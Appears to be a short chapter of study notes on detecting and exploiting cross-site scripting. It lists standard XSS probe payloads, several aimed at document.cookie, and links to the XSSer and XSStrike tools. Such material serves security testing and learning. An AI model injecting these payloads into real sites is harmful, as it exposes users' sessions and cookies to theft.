Chapter 7: XSS Detection and Exploitation
Test payloads
<script>alert('XSS')</script>
<script>alert(document.cookie)</script>
><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<img src="javascript:alert('XSS')">
onerror= "alert('XSS')">
https://blog.csdn.net/weixin_34038652/article/details/90221170
XSSer
https://xsser.03c8.net/
https://www.freebuf.com/sectool/173228.html
https://blog.csdn.net/gao646467783/article/details/113249158
XSStrike
https://github.com/s0md3v/XSStrike
Python 3.6 or later